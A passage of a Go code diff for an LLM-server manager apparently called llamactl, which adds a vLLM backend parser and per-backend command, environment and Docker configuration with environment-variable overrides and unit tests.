LoraModules string `json:"lora_modules,omitempty"`
PromptAdapters string `json:"prompt_adapters,omitempty"`
MaxPromptAdapterToken int `json:"max_prompt_adapter_token,omitempty"`
Device string `json:"device,omitempty"`
SchedulerDelay float64 `json:"scheduler_delay,omitempty"`
EnableChunkedPrefill bool `json:"enable_chunked_prefill,omitempty"`
SpeculativeModel string `json:"speculative_model,omitempty"`
SpeculativeModelQuantization string `json:"speculative_model_quantization,omitempty"`
SpeculativeRevision string `json:"speculative_revision,omitempty"`
SpeculativeMaxModelLen int `json:"speculative_max_model_len,omitempty"`
SpeculativeDisableByBatchSize int `json:"speculative_disable_by_batch_size,omitempty"`
NgptSpeculativeLength int `json:"ngpt_speculative_length,omitempty"`
SpeculativeDisableMqa bool `json:"speculative_disable_mqa,omitempty"`
ModelLoaderExtraConfig string `json:"model_loader_extra_config,omitempty"`
IgnorePatterns string `json:"ignore_patterns,omitempty"`
PreloadedLoraModules string `json:"preloaded_lora_modules,omitempty"`
// OpenAI server specific options
UDS string `json:"uds,omitempty"`
UvicornLogLevel string `json:"uvicorn_log_level,omitempty"`
ResponseRole string `json:"response_role,omitempty"`
SSLKeyfile string `json:"ssl_keyfile,omitempty"`
SSLCertfile string `json:"ssl_certfile,omitempty"`
SSLCACerts string `json:"ssl_ca_certs,omitempty"`
SSLCertReqs int `json:"ssl_cert_reqs,omitempty"`
RootPath string `json:"root_path,omitempty"`
Middleware []string `json:"middleware,omitempty"`
ReturnTokensAsTokenIDS bool `json:"return_tokens_as_token_ids,omitempty"`
DisableFrontendMultiprocessing bool `json:"disable_frontend_multiprocessing,omitempty"`
EnableAutoToolChoice bool `json:"enable_auto_tool_choice,omitempty"`
ToolCallParser string `json:"tool_call_parser,omitempty"`
ToolServer string `json:"tool_server,omitempty"`
ChatTemplate string `json:"chat_template,omitempty"`
ChatTemplateContentFormat string `json:"chat_template_content_format,omitempty"`
AllowCredentials bool `json:"allow_credentials,omitempty"`
AllowedOrigins []string `json:"allowed_origins,omitempty"`
AllowedMethods []string `json:"allowed_methods,omitempty"`
AllowedHeaders []string `json:"allowed_headers,omitempty"`
APIKey []string `json:"api_key,omitempty"`
EnableLogOutputs bool `json:"enable_log_outputs,omitempty"`
EnableTokenUsage bool `json:"enable_token_usage,omitempty"`
EnableAsyncEngineDebug bool `json:"enable_async_engine_debug,omitempty"`
EngineUseRay bool `json:"engine_use_ray,omitempty"`
DisableLogRequests bool `json:"disable_log_requests,omitempty"`
MaxLogLen int `json:"max_log_len,omitempty"`
// Additional engine configuration
Task string `json:"task,omitempty"`
MultiModalConfig string `json:"multi_modal_config,omitempty"`
LimitMmPerPrompt string `json:"limit_mm_per_prompt,omitempty"`
EnableSleepMode bool `json:"enable_sleep_mode,omitempty"`
EnableChunkingRequest bool `json:"enable_chunking_request,omitempty"`
CompilationConfig string `json:"compilation_config,omitempty"`
DisableSlidingWindowMask bool `json:"disable_sliding_window_mask,omitempty"`
EnableTRTLLMEngineLatency bool `json:"enable_trtllm_engine_latency,omitempty"`
OverridePoolingConfig string `json:"override_pooling_config,omitempty"`
OverrideNeuronConfig string `json:"override_neuron_config,omitempty"`
OverrideKVCacheALIGNSize int `json:"override_kv_cache_align_size,omitempty"`
}
// BuildCommandArgs converts VllmServerOptions to command line arguments
// For vLLM native, model is a positional argument after "serve"
func (o *VllmServerOptions) BuildCommandArgs() []string {
var args []string
// Add model as positional argument if specified (for native execution)
if o.Model != "" {
args = append(args, o.Model)
}
// Create a copy without Model field to avoid --model flag
optionsCopy := *o
optionsCopy.Model = ""
// Use package-level multiValuedFlags variable
flagArgs := backends.BuildCommandArgs(&optionsCopy, multiValuedFlags)
args = append(args, flagArgs...)
return args
}
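// Minimal sketch of the vLLM argument layout: the model stays positional and the
// remaining non-zero fields become flags. The model name here is a placeholder.
func exampleVllmCommandArgs() []string {
opts := &VllmServerOptions{Model: "my-org/my-model", TensorParallelSize: 2}
// Returns ["my-org/my-model", "--tensor-parallel-size", "2"]
return opts.BuildCommandArgs()
}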
func (o *VllmServerOptions) BuildDockerArgs() []string {
var args []string
// Use package-level multiValuedFlags variable
flagArgs := backends.BuildCommandArgs(o, multiValuedFlags)
args = append(args, flagArgs...)
return args
}
// ParseVllmCommand parses a vLLM serve command string into VllmServerOptions
// Supports multiple formats:
// 1. Full command: "vllm serve --model MODEL_NAME --other-args"
// 2. Full path: "/usr/local/bin/vllm serve --model MODEL_NAME"
// 3. Serve only: "serve --model MODEL_NAME --other-args"
// 4. Args only: "--model MODEL_NAME --other-args"
// 5. Multiline commands with backslashes
func ParseVllmCommand(command string) (*VllmServerOptions, error) {
executableNames := []string{"vllm"}
subcommandNames := []string{"serve"}
multiValuedFlags := map[string]bool{
"middleware": true,
"api_key": true,
"allowed_origins": true,
"allowed_methods": true,
"allowed_headers": true,
"lora_modules": true,
"prompt_adapters": true,
}
var vllmOptions VllmServerOptions
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil {
return nil, err
}
return &vllmOptions, nil
}


@@ -0,0 +1,153 @@
package vllm_test
import (
"llamactl/pkg/backends/vllm"
"slices"
"testing"
)
func TestParseVllmCommand(t *testing.T) {
tests := []struct {
name string
command string
expectErr bool
}{
{
name: "basic vllm serve command",
command: "vllm serve microsoft/DialoGPT-medium",
expectErr: false,
},
{
name: "serve only command",
command: "serve microsoft/DialoGPT-medium",
expectErr: false,
},
{
name: "positional model with flags",
command: "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2",
expectErr: false,
},
{
name: "model with path",
command: "vllm serve /path/to/model --gpu-memory-utilization 0.8",
expectErr: false,
},
{
name: "empty command",
command: "",
expectErr: true,
},
{
name: "unterminated quote",
command: `vllm serve "unterminated`,
expectErr: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := vllm.ParseVllmCommand(tt.command)
if tt.expectErr {
if err == nil {
t.Errorf("expected error but got none")
}
return
}
if err != nil {
t.Errorf("unexpected error: %v", err)
return
}
if result == nil {
t.Errorf("expected result but got nil")
}
})
}
}
func TestParseVllmCommandValues(t *testing.T) {
command := "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs"
result, err := vllm.ParseVllmCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if result.Model != "test-model" {
t.Errorf("expected model 'test-model', got '%s'", result.Model)
}
if result.TensorParallelSize != 4 {
t.Errorf("expected tensor_parallel_size 4, got %d", result.TensorParallelSize)
}
if result.GPUMemoryUtilization != 0.8 {
t.Errorf("expected gpu_memory_utilization 0.8, got %f", result.GPUMemoryUtilization)
}
if !result.EnableLogOutputs {
t.Errorf("expected enable_log_outputs true, got %v", result.EnableLogOutputs)
}
}
func TestBuildCommandArgs(t *testing.T) {
options := vllm.VllmServerOptions{
Model: "microsoft/DialoGPT-medium",
Port: 8080,
Host: "localhost",
TensorParallelSize: 2,
GPUMemoryUtilization: 0.8,
EnableLogOutputs: true,
AllowedOrigins: []string{"http://localhost:3000", "https://example.com"},
}
args := options.BuildCommandArgs()
// Check that model is the first positional argument (not a --model flag)
if len(args) == 0 || args[0] != "microsoft/DialoGPT-medium" {
t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", args)
}
// Check that --model flag is NOT present (since model should be positional)
if contains(args, "--model") {
t.Errorf("Found --model flag, but model should be positional argument in args: %v", args)
}
// Check other flags
if !containsFlagWithValue(args, "--tensor-parallel-size", "2") {
t.Errorf("Expected --tensor-parallel-size 2 not found in %v", args)
}
if !contains(args, "--enable-log-outputs") {
t.Errorf("Expected --enable-log-outputs not found in %v", args)
}
if !contains(args, "--host") {
t.Errorf("Expected --host not found in %v", args)
}
if !contains(args, "--port") {
t.Errorf("Expected --port not found in %v", args)
}
// Check array handling (multiple flags)
allowedOriginsCount := 0
for i := range args {
if args[i] == "--allowed-origins" {
allowedOriginsCount++
}
}
if allowedOriginsCount != 2 {
t.Errorf("Expected 2 --allowed-origins flags, got %d", allowedOriginsCount)
}
}
// Helper functions
func contains(slice []string, item string) bool {
return slices.Contains(slice, item)
}
func containsFlagWithValue(args []string, flag, value string) bool {
for i, arg := range args {
if arg == flag && i+1 < len(args) && args[i+1] == value {
return true
}
}
return false
}


@@ -1,6 +1,7 @@
package config
import (
"log"
"os"
"path/filepath"
"runtime"
@@ -10,9 +11,33 @@ import (
"gopkg.in/yaml.v3"
)
// BackendSettings contains structured backend configuration
type BackendSettings struct {
Command string `yaml:"command"`
Args []string `yaml:"args"`
Environment map[string]string `yaml:"environment,omitempty"`
Docker *DockerSettings `yaml:"docker,omitempty"`
}
// DockerSettings contains Docker-specific configuration
type DockerSettings struct {
Enabled bool `yaml:"enabled"`
Image string `yaml:"image"`
Args []string `yaml:"args"`
Environment map[string]string `yaml:"environment,omitempty"`
}
// BackendConfig contains backend executable configurations
type BackendConfig struct {
LlamaCpp BackendSettings `yaml:"llama-cpp"`
VLLM BackendSettings `yaml:"vllm"`
MLX BackendSettings `yaml:"mlx"`
}
// AppConfig represents the configuration for llamactl
type AppConfig struct {
Server ServerConfig `yaml:"server"`
Backends BackendConfig `yaml:"backends"`
Instances InstancesConfig `yaml:"instances"`
Auth AuthConfig `yaml:"auth"`
Version string `yaml:"-"`
@@ -55,8 +80,11 @@ type InstancesConfig struct {
// Maximum number of instances that can be created
MaxInstances int `yaml:"max_instances"`
// Maximum number of instances that can be running at the same time
MaxRunningInstances int `yaml:"max_running_instances,omitempty"`
// Enable LRU eviction for instance logs
EnableLRUEviction bool `yaml:"enable_lru_eviction"`
// Default auto-restart setting for new instances
DefaultAutoRestart bool `yaml:"default_auto_restart"`
@@ -106,14 +134,50 @@ func LoadConfig(configPath string) (AppConfig, error) {
AllowedOrigins: []string{"*"}, // Default to allow all origins
EnableSwagger: false,
},
Backends: BackendConfig{
LlamaCpp: BackendSettings{
Command: "llama-server",
Args: []string{},
Environment: map[string]string{},
Docker: &DockerSettings{
Enabled: false,
Image: "ghcr.io/ggml-org/llama.cpp:server",
Args: []string{
"run", "--rm", "--network", "host", "--gpus", "all",
"-v", filepath.Join(getDefaultDataDirectory(), "llama.cpp") + ":/root/.cache/llama.cpp"},
Environment: map[string]string{},
},
},
VLLM: BackendSettings{
Command: "vllm",
Args: []string{"serve"},
Docker: &DockerSettings{
Enabled: false,
Image: "vllm/vllm-openai:latest",
Args: []string{
"run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g",
"-v", filepath.Join(getDefaultDataDirectory(), "huggingface") + ":/root/.cache/huggingface",
},
Environment: map[string]string{},
},
},
MLX: BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
// No Docker section for MLX - not supported
},
},
Instances: InstancesConfig{
PortRange: [2]int{8000, 9000},
DataDir: getDefaultDataDirectory(),
// NOTE: empty strings are set as placeholder values since InstancesDir and LogsDir
// should be relative path to DataDir if not explicitly set.
InstancesDir: "",
LogsDir: "",
AutoCreateDirs: true,
MaxInstances: -1, // -1 means unlimited
MaxRunningInstances: -1, // -1 means unlimited
EnableLRUEviction: true,
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
@@ -137,6 +201,14 @@ func LoadConfig(configPath string) (AppConfig, error) {
// 3. Override with environment variables
loadEnvVars(&cfg)
// If InstancesDir or LogsDir is not set, set it to relative path of DataDir
if cfg.Instances.InstancesDir == "" {
cfg.Instances.InstancesDir = filepath.Join(cfg.Instances.DataDir, "instances")
}
if cfg.Instances.LogsDir == "" {
cfg.Instances.LogsDir = filepath.Join(cfg.Instances.DataDir, "logs")
}
return cfg, nil
}
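// Minimal sketch of the relative-directory behavior above: when no config file or
// environment override sets them, InstancesDir and LogsDir resolve under DataDir.
func exampleRelativeDirs() (string, string) {
cfg, _ := LoadConfig("nonexistent.yaml") // falls back to defaults, as in the tests
// Returns filepath.Join(cfg.Instances.DataDir, "instances") and filepath.Join(cfg.Instances.DataDir, "logs").
return cfg.Instances.InstancesDir, cfg.Instances.LogsDir
}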
@@ -157,6 +229,7 @@ func loadConfigFile(cfg *AppConfig, configPath string) error {
if err := yaml.Unmarshal(data, cfg); err != nil {
return err
}
log.Printf("Read config at %s", path)
return nil
}
}
@@ -211,9 +284,118 @@ func loadEnvVars(cfg *AppConfig) {
cfg.Instances.MaxInstances = m
}
}
if maxRunning := os.Getenv("LLAMACTL_MAX_RUNNING_INSTANCES"); maxRunning != "" {
if m, err := strconv.Atoi(maxRunning); err == nil {
cfg.Instances.MaxRunningInstances = m
}
}
if enableLRUEviction := os.Getenv("LLAMACTL_ENABLE_LRU_EVICTION"); enableLRUEviction != "" {
if b, err := strconv.ParseBool(enableLRUEviction); err == nil {
cfg.Instances.EnableLRUEviction = b
}
}
// Backend config
// LlamaCpp backend
if llamaCmd := os.Getenv("LLAMACTL_LLAMACPP_COMMAND"); llamaCmd != "" {
cfg.Backends.LlamaCpp.Command = llamaCmd
}
if llamaArgs := os.Getenv("LLAMACTL_LLAMACPP_ARGS"); llamaArgs != "" {
cfg.Backends.LlamaCpp.Args = strings.Split(llamaArgs, " ")
}
if llamaEnv := os.Getenv("LLAMACTL_LLAMACPP_ENV"); llamaEnv != "" {
if cfg.Backends.LlamaCpp.Environment == nil {
cfg.Backends.LlamaCpp.Environment = make(map[string]string)
}
parseEnvVars(llamaEnv, cfg.Backends.LlamaCpp.Environment)
}
if llamaDockerEnabled := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_ENABLED"); llamaDockerEnabled != "" {
if b, err := strconv.ParseBool(llamaDockerEnabled); err == nil {
if cfg.Backends.LlamaCpp.Docker == nil {
cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
}
cfg.Backends.LlamaCpp.Docker.Enabled = b
}
}
if llamaDockerImage := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_IMAGE"); llamaDockerImage != "" {
if cfg.Backends.LlamaCpp.Docker == nil {
cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
}
cfg.Backends.LlamaCpp.Docker.Image = llamaDockerImage
}
if llamaDockerArgs := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_ARGS"); llamaDockerArgs != "" {
if cfg.Backends.LlamaCpp.Docker == nil {
cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
}
cfg.Backends.LlamaCpp.Docker.Args = strings.Split(llamaDockerArgs, " ")
}
if llamaDockerEnv := os.Getenv("LLAMACTL_LLAMACPP_DOCKER_ENV"); llamaDockerEnv != "" {
if cfg.Backends.LlamaCpp.Docker == nil {
cfg.Backends.LlamaCpp.Docker = &DockerSettings{}
}
if cfg.Backends.LlamaCpp.Docker.Environment == nil {
cfg.Backends.LlamaCpp.Docker.Environment = make(map[string]string)
}
parseEnvVars(llamaDockerEnv, cfg.Backends.LlamaCpp.Docker.Environment)
}
// vLLM backend
if vllmCmd := os.Getenv("LLAMACTL_VLLM_COMMAND"); vllmCmd != "" {
cfg.Backends.VLLM.Command = vllmCmd
}
if vllmArgs := os.Getenv("LLAMACTL_VLLM_ARGS"); vllmArgs != "" {
cfg.Backends.VLLM.Args = strings.Split(vllmArgs, " ")
}
if vllmEnv := os.Getenv("LLAMACTL_VLLM_ENV"); vllmEnv != "" {
if cfg.Backends.VLLM.Environment == nil {
cfg.Backends.VLLM.Environment = make(map[string]string)
}
parseEnvVars(vllmEnv, cfg.Backends.VLLM.Environment)
}
if vllmDockerEnabled := os.Getenv("LLAMACTL_VLLM_DOCKER_ENABLED"); vllmDockerEnabled != "" {
if b, err := strconv.ParseBool(vllmDockerEnabled); err == nil {
if cfg.Backends.VLLM.Docker == nil {
cfg.Backends.VLLM.Docker = &DockerSettings{}
}
cfg.Backends.VLLM.Docker.Enabled = b
}
}
if vllmDockerImage := os.Getenv("LLAMACTL_VLLM_DOCKER_IMAGE"); vllmDockerImage != "" {
if cfg.Backends.VLLM.Docker == nil {
cfg.Backends.VLLM.Docker = &DockerSettings{}
}
cfg.Backends.VLLM.Docker.Image = vllmDockerImage
}
if vllmDockerArgs := os.Getenv("LLAMACTL_VLLM_DOCKER_ARGS"); vllmDockerArgs != "" {
if cfg.Backends.VLLM.Docker == nil {
cfg.Backends.VLLM.Docker = &DockerSettings{}
}
cfg.Backends.VLLM.Docker.Args = strings.Split(vllmDockerArgs, " ")
}
if vllmDockerEnv := os.Getenv("LLAMACTL_VLLM_DOCKER_ENV"); vllmDockerEnv != "" {
if cfg.Backends.VLLM.Docker == nil {
cfg.Backends.VLLM.Docker = &DockerSettings{}
}
if cfg.Backends.VLLM.Docker.Environment == nil {
cfg.Backends.VLLM.Docker.Environment = make(map[string]string)
}
parseEnvVars(vllmDockerEnv, cfg.Backends.VLLM.Docker.Environment)
}
// MLX backend
if mlxCmd := os.Getenv("LLAMACTL_MLX_COMMAND"); mlxCmd != "" {
cfg.Backends.MLX.Command = mlxCmd
}
if mlxArgs := os.Getenv("LLAMACTL_MLX_ARGS"); mlxArgs != "" {
cfg.Backends.MLX.Args = strings.Split(mlxArgs, " ")
}
if mlxEnv := os.Getenv("LLAMACTL_MLX_ENV"); mlxEnv != "" {
if cfg.Backends.MLX.Environment == nil {
cfg.Backends.MLX.Environment = make(map[string]string)
}
parseEnvVars(mlxEnv, cfg.Backends.MLX.Environment)
}
// Instance defaults
if autoRestart := os.Getenv("LLAMACTL_DEFAULT_AUTO_RESTART"); autoRestart != "" {
if b, err := strconv.ParseBool(autoRestart); err == nil {
cfg.Instances.DefaultAutoRestart = b
@@ -286,6 +468,19 @@ func ParsePortRange(s string) [2]int {
return [2]int{0, 0} // Invalid format
}
// parseEnvVars parses environment variables in format "KEY1=value1,KEY2=value2"
// and populates the provided environment map
func parseEnvVars(envString string, envMap map[string]string) {
if envString == "" {
return
}
for _, envPair := range strings.Split(envString, ",") {
if parts := strings.SplitN(strings.TrimSpace(envPair), "=", 2); len(parts) == 2 {
envMap[parts[0]] = parts[1]
}
}
}
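// Minimal sketch of parseEnvVars, the format shared by all LLAMACTL_*_ENV variables.
func exampleParseEnvVars() map[string]string {
env := map[string]string{}
parseEnvVars("CUDA_VISIBLE_DEVICES=0,OMP_NUM_THREADS=4", env)
// env now contains {"CUDA_VISIBLE_DEVICES": "0", "OMP_NUM_THREADS": "4"}
return env
}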
// getDefaultDataDirectory returns platform-specific default data directory
func getDefaultDataDirectory() string {
switch runtime.GOOS {
@@ -318,6 +513,10 @@ func getDefaultDataDirectory() string {
// getDefaultConfigLocations returns platform-specific config file locations
func getDefaultConfigLocations() []string {
var locations []string
// Check ./llamactl.yaml and ./config.yaml in the current directory as the default config files
locations = append(locations, "llamactl.yaml")
locations = append(locations, "config.yaml")
homeDir, _ := os.UserHomeDir()
switch runtime.GOOS {
@@ -347,3 +546,17 @@ func getDefaultConfigLocations() []string {
return locations
}
// GetBackendSettings resolves backend settings
func (bc *BackendConfig) GetBackendSettings(backendType string) BackendSettings {
switch backendType {
case "llama-cpp":
return bc.LlamaCpp
case "vllm":
return bc.VLLM
case "mlx":
return bc.MLX
default:
return BackendSettings{}
}
}
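// Minimal sketch of resolving settings per backend type; an unknown type yields
// zero-value settings.
func exampleGetBackendSettings(cfg *AppConfig) (string, []string) {
vllmSettings := cfg.Backends.GetBackendSettings("vllm")
// With the defaults above: "vllm", ["serve"].
return vllmSettings.Command, vllmSettings.Args
}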


@@ -42,9 +42,6 @@ func TestLoadConfig_Defaults(t *testing.T) {
if cfg.Instances.MaxInstances != -1 {
t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
}
if cfg.Instances.LlamaExecutable != "llama-server" {
t.Errorf("Expected default executable 'llama-server', got %q", cfg.Instances.LlamaExecutable)
}
if !cfg.Instances.DefaultAutoRestart {
t.Error("Expected default auto restart to be true")
}
@@ -101,9 +98,6 @@ instances:
if cfg.Instances.MaxInstances != 5 {
t.Errorf("Expected max instances 5, got %d", cfg.Instances.MaxInstances)
}
if cfg.Instances.LlamaExecutable != "/usr/bin/llama-server" {
t.Errorf("Expected executable '/usr/bin/llama-server', got %q", cfg.Instances.LlamaExecutable)
}
if cfg.Instances.DefaultAutoRestart {
t.Error("Expected auto restart to be false")
}
@@ -123,7 +117,6 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
"LLAMACTL_INSTANCE_PORT_RANGE": "5000-6000",
"LLAMACTL_LOGS_DIR": "/env/logs",
"LLAMACTL_MAX_INSTANCES": "20",
"LLAMACTL_LLAMA_EXECUTABLE": "/env/llama-server",
"LLAMACTL_DEFAULT_AUTO_RESTART": "false",
"LLAMACTL_DEFAULT_MAX_RESTARTS": "7",
"LLAMACTL_DEFAULT_RESTART_DELAY": "15",
@@ -156,8 +149,8 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
if cfg.Instances.MaxInstances != 20 {
t.Errorf("Expected max instances 20, got %d", cfg.Instances.MaxInstances)
}
if cfg.Backends.LlamaCpp.Command != "llama-server" {
t.Errorf("Expected default llama command 'llama-server', got %q", cfg.Backends.LlamaCpp.Command)
}
if cfg.Instances.DefaultAutoRestart {
t.Error("Expected auto restart to be false")
@@ -355,3 +348,165 @@ server:
t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
}
}
func TestGetBackendSettings_NewStructuredConfig(t *testing.T) {
bc := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "custom-llama",
Args: []string{"--verbose"},
Docker: &config.DockerSettings{
Enabled: true,
Image: "custom-llama:latest",
Args: []string{"--gpus", "all"},
Environment: map[string]string{"CUDA_VISIBLE_DEVICES": "1"},
},
},
VLLM: config.BackendSettings{
Command: "custom-vllm",
Args: []string{"serve", "--debug"},
},
MLX: config.BackendSettings{
Command: "custom-mlx",
Args: []string{},
},
}
// Test llama-cpp with Docker
settings := bc.GetBackendSettings("llama-cpp")
if settings.Command != "custom-llama" {
t.Errorf("Expected command 'custom-llama', got %q", settings.Command)
}
if len(settings.Args) != 1 || settings.Args[0] != "--verbose" {
t.Errorf("Expected args ['--verbose'], got %v", settings.Args)
}
if settings.Docker == nil || !settings.Docker.Enabled {
t.Error("Expected Docker to be enabled")
}
if settings.Docker.Image != "custom-llama:latest" {
t.Errorf("Expected Docker image 'custom-llama:latest', got %q", settings.Docker.Image)
}
// Test vLLM without Docker
settings = bc.GetBackendSettings("vllm")
if settings.Command != "custom-vllm" {
t.Errorf("Expected command 'custom-vllm', got %q", settings.Command)
}
if len(settings.Args) != 2 || settings.Args[0] != "serve" || settings.Args[1] != "--debug" {
t.Errorf("Expected args ['serve', '--debug'], got %v", settings.Args)
}
if settings.Docker != nil && settings.Docker.Enabled {
t.Error("Expected Docker to be disabled or nil")
}
// Test MLX
settings = bc.GetBackendSettings("mlx")
if settings.Command != "custom-mlx" {
t.Errorf("Expected command 'custom-mlx', got %q", settings.Command)
}
}
func TestGetBackendSettings_EmptyConfig(t *testing.T) {
bc := &config.BackendConfig{}
// Test empty llama-cpp
settings := bc.GetBackendSettings("llama-cpp")
if settings.Command != "" {
t.Errorf("Expected empty command, got %q", settings.Command)
}
// Test empty vLLM
settings = bc.GetBackendSettings("vllm")
if settings.Command != "" {
t.Errorf("Expected empty command, got %q", settings.Command)
}
// Test empty MLX
settings = bc.GetBackendSettings("mlx")
if settings.Command != "" {
t.Errorf("Expected empty command, got %q", settings.Command)
}
}
func TestLoadConfig_BackendEnvironmentVariables(t *testing.T) {
// Test that backend environment variables work correctly
envVars := map[string]string{
"LLAMACTL_LLAMACPP_COMMAND": "env-llama",
"LLAMACTL_LLAMACPP_ARGS": "--verbose --threads 4",
"LLAMACTL_LLAMACPP_DOCKER_ENABLED": "true",
"LLAMACTL_LLAMACPP_DOCKER_IMAGE": "env-llama:latest",
"LLAMACTL_LLAMACPP_DOCKER_ARGS": "run --rm --network host --gpus all",
"LLAMACTL_LLAMACPP_DOCKER_ENV": "CUDA_VISIBLE_DEVICES=0,OMP_NUM_THREADS=4",
"LLAMACTL_VLLM_COMMAND": "env-vllm",
"LLAMACTL_VLLM_DOCKER_ENABLED": "false",
"LLAMACTL_VLLM_DOCKER_IMAGE": "env-vllm:latest",
"LLAMACTL_VLLM_DOCKER_ENV": "PYTORCH_CUDA_ALLOC_CONF=max_split_size_mb:512,CUDA_VISIBLE_DEVICES=1",
"LLAMACTL_MLX_COMMAND": "env-mlx",
}
// Set env vars and ensure cleanup
for key, value := range envVars {
os.Setenv(key, value)
defer os.Unsetenv(key)
}
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
// Verify llama-cpp environment overrides
if cfg.Backends.LlamaCpp.Command != "env-llama" {
t.Errorf("Expected llama command 'env-llama', got %q", cfg.Backends.LlamaCpp.Command)
}
expectedArgs := []string{"--verbose", "--threads", "4"}
if len(cfg.Backends.LlamaCpp.Args) != len(expectedArgs) {
t.Errorf("Expected llama args %v, got %v", expectedArgs, cfg.Backends.LlamaCpp.Args)
}
if !cfg.Backends.LlamaCpp.Docker.Enabled {
t.Error("Expected llama Docker to be enabled")
}
if cfg.Backends.LlamaCpp.Docker.Image != "env-llama:latest" {
t.Errorf("Expected llama Docker image 'env-llama:latest', got %q", cfg.Backends.LlamaCpp.Docker.Image)
}
expectedDockerArgs := []string{"run", "--rm", "--network", "host", "--gpus", "all"}
if len(cfg.Backends.LlamaCpp.Docker.Args) != len(expectedDockerArgs) {
t.Errorf("Expected llama Docker args %v, got %v", expectedDockerArgs, cfg.Backends.LlamaCpp.Docker.Args)
}
if cfg.Backends.LlamaCpp.Docker.Environment["CUDA_VISIBLE_DEVICES"] != "0" {
t.Errorf("Expected CUDA_VISIBLE_DEVICES=0, got %q", cfg.Backends.LlamaCpp.Docker.Environment["CUDA_VISIBLE_DEVICES"])
}
if cfg.Backends.LlamaCpp.Docker.Environment["OMP_NUM_THREADS"] != "4" {
t.Errorf("Expected OMP_NUM_THREADS=4, got %q", cfg.Backends.LlamaCpp.Docker.Environment["OMP_NUM_THREADS"])
}
// Verify vLLM environment overrides
if cfg.Backends.VLLM.Command != "env-vllm" {
t.Errorf("Expected vLLM command 'env-vllm', got %q", cfg.Backends.VLLM.Command)
}
if cfg.Backends.VLLM.Docker.Enabled {
t.Error("Expected vLLM Docker to be disabled")
}
if cfg.Backends.VLLM.Docker.Environment["PYTORCH_CUDA_ALLOC_CONF"] != "max_split_size_mb:512" {
t.Errorf("Expected PYTORCH_CUDA_ALLOC_CONF=max_split_size_mb:512, got %q", cfg.Backends.VLLM.Docker.Environment["PYTORCH_CUDA_ALLOC_CONF"])
}
// Verify MLX environment overrides
if cfg.Backends.MLX.Command != "env-mlx" {
t.Errorf("Expected MLX command 'env-mlx', got %q", cfg.Backends.MLX.Command)
}
}
func TestGetBackendSettings_InvalidBackendType(t *testing.T) {
bc := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
Args: []string{},
},
}
// Test invalid backend type returns empty settings
settings := bc.GetBackendSettings("invalid-backend")
if settings.Command != "" {
t.Errorf("Expected empty command for invalid backend, got %q", settings.Command)
}
}


@@ -5,7 +5,7 @@ import (
"encoding/json"
"fmt"
"io"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/backends"
"llamactl/pkg/config"
"log"
"net/http"
@@ -29,60 +29,16 @@ func (realTimeProvider) Now() time.Time {
return time.Now()
}
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"`
// On demand start
OnDemandStart *bool `json:"on_demand_start,omitempty"`
// Idle timeout
IdleTimeout *int `json:"idle_timeout,omitempty"`
// LlamaServerOptions contains the options for the llama server
llamacpp.LlamaServerOptions `json:",inline"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
// This is needed because the embedded LlamaServerOptions has its own UnmarshalJSON
// which can interfere with proper unmarshaling of the pointer fields
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// First, unmarshal into a temporary struct without the embedded type
type tempCreateOptions struct {
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"`
OnDemandStart *bool `json:"on_demand_start,omitempty"`
IdleTimeout *int `json:"idle_timeout,omitempty"`
}
var temp tempCreateOptions
if err := json.Unmarshal(data, &temp); err != nil {
return err
}
// Copy the pointer fields
c.AutoRestart = temp.AutoRestart
c.MaxRestarts = temp.MaxRestarts
c.RestartDelay = temp.RestartDelay
c.OnDemandStart = temp.OnDemandStart
c.IdleTimeout = temp.IdleTimeout
// Now unmarshal the embedded LlamaServerOptions
if err := json.Unmarshal(data, &c.LlamaServerOptions); err != nil {
return err
}
return nil
}
// Process represents a running instance of the llama server
type Process struct {
Name string `json:"name"`
options *CreateInstanceOptions `json:"-"`
globalInstanceSettings *config.InstancesConfig
globalBackendSettings *config.BackendConfig
// Status
Status InstanceStatus `json:"status"`
onStatusChange func(oldStatus, newStatus InstanceStatus)
// Creation time
Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
@@ -109,105 +65,24 @@ type Process struct {
timeProvider TimeProvider `json:"-"` // Time provider for testing
}
// validateAndCopyOptions validates and creates a deep copy of the provided options
// It applies validation rules and returns a safe copy
func validateAndCopyOptions(name string, options *CreateInstanceOptions) *CreateInstanceOptions {
optionsCopy := &CreateInstanceOptions{}
if options != nil {
// Copy the embedded LlamaServerOptions
optionsCopy.LlamaServerOptions = options.LlamaServerOptions
// Copy and validate pointer fields
if options.AutoRestart != nil {
autoRestart := *options.AutoRestart
optionsCopy.AutoRestart = &autoRestart
}
if options.MaxRestarts != nil {
maxRestarts := *options.MaxRestarts
if maxRestarts < 0 {
